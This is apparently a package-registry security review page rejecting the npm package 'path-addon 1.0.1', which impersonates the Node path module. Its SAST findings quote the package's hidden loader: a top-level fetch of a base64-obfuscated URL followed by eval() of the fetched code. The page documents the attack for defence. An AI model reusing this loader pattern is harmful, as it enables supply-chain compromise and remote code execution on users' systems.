All path-addon versions

path-addon @1.0.1

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
100
Risk Score
ISC
License
No
Install Scripts
7
Dependencies
0
Dev Dependencies
5.5 KB
Package Size
Published

Node.js path module

Maintainers

helensilva196115

Dependencies (7)

PackageConstraintRegistry Status
fs ^0.0.1-security auto_approved
path ^0.12.7 auto_approved
util ^0.10.3 auto_approved
axios ^1.4.0 auto_approved
execp ^0.0.1 auto_approved
process ^0.11.1 auto_approved
request ^2.88.2 No greenflagged match

Transitive Dependency Tree

37 transitive deps max depth 5
  ├─ axios ^1.4.0 → 1.18.1
  ├─ execp ^0.0.1 → 0.0.1
  ├─ fs ^0.0.1-security → 0.0.1-security
  ├─ path ^0.12.7 → 0.12.7
  ├─ process ^0.11.1 → 0.11.10
  ├─ request ^2.88.2
├─ util ^0.10.3 → 0.10.4
  ├─ follow-redirects ^1.16.0 → 1.16.0
  ├─ form-data ^4.0.5 → 4.0.6
  ├─ https-proxy-agent ^5.0.1 → 5.0.1
  ├─ inherits 2.0.3 → 2.0.3
  ├─ lodash ^4.13.1 → 4.18.1
├─ proxy-from-env ^2.1.0 → 2.1.0
  ├─ agent-base 6 → 6.0.2
  ├─ asynckit ^0.4.0 → 0.4.0
  ├─ combined-stream ^1.0.8 → 1.0.8
  ├─ debug 4 → 4.4.3
  ├─ es-set-tostringtag ^2.1.0 → 2.1.0
  ├─ hasown ^2.0.4 → 2.0.4
├─ mime-types ^2.1.35 → 2.1.35
  ├─ delayed-stream ~1.0.0 → 1.0.0
  ├─ es-errors ^1.3.0 → 1.3.0
  ├─ function-bind ^1.1.2 → 1.1.2
  ├─ get-intrinsic ^1.2.6 → 1.3.1
  ├─ has-tostringtag ^1.0.2 → 1.0.2
  ├─ mime-db 1.52.0
├─ ms ^2.1.3 → 2.1.3
  ├─ async-function ^1.0.0
  ├─ async-generator-function ^1.0.0 → 1.0.0
  ├─ call-bind-apply-helpers ^1.0.2 → 1.0.2
  ├─ es-define-property ^1.0.1 → 1.0.1
  ├─ es-object-atoms ^1.1.1 → 1.1.2
  ├─ generator-function ^2.0.0 → 2.0.1
  ├─ get-proto ^1.0.1
  ├─ gopd ^1.2.0 → 1.2.0
  ├─ has-symbols ^1.0.3 → 1.1.0
  ├─ math-intrinsics ^1.1.0 → 1.1.0

Risk Dispositions (2 applicable to this version, 1 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule Source Disposition Author Reason
semgrep:toplevel-fetch semgrep reject AI AI (semgrep): Fetches obfuscated remote URL at module load; exfiltration/RCE vector. Generalizes to all versions of this package.
semgrep:eval-usage semgrep reject AI AI (semgrep): eval()s remotely fetched payload; arbitrary code execution. Generalizes to all versions of this package.
Show 1 disposition(s) that do not match any finding on this version
Rule Source Disposition Author Reason
bogus-package bogus-package reject AI AI (bogus-package): No repo, no keywords, inflated semver — consistent with a malicious impersonation package.

SAST Findings (4)

CRITICAL toplevel-fetch: path.js:574 semgrep

[Always reject] Top-level fetch() call — could indicate telemetry or data exfiltration at module load 572 | }; 573 | > 574 | fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9YT0ZKMg==")) 575 | .then(response => response.json()) 576 | .then(data => {

CRITICAL eval-usage: path.js:578 semgrep

[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source. 576 | .then(data => { 577 | const codeOne = data.one; > 578 | eval(codeOne); 579 | const codeTwo = data.two; 580 | eval(codeTwo);

CRITICAL eval-usage: path.js:580 semgrep

[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source. 578 | eval(codeOne); 579 | const codeTwo = data.two; > 580 | eval(codeTwo); 581 | }) 582 | .catch(error => console.error('Error fetching or executing code:', error));

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

Review Summary

Risk score: 100 (capped from 151). Findings: 3 critical (+120), 1 medium (+10), 7 low (+21), 1 info (+0).

Published to npm: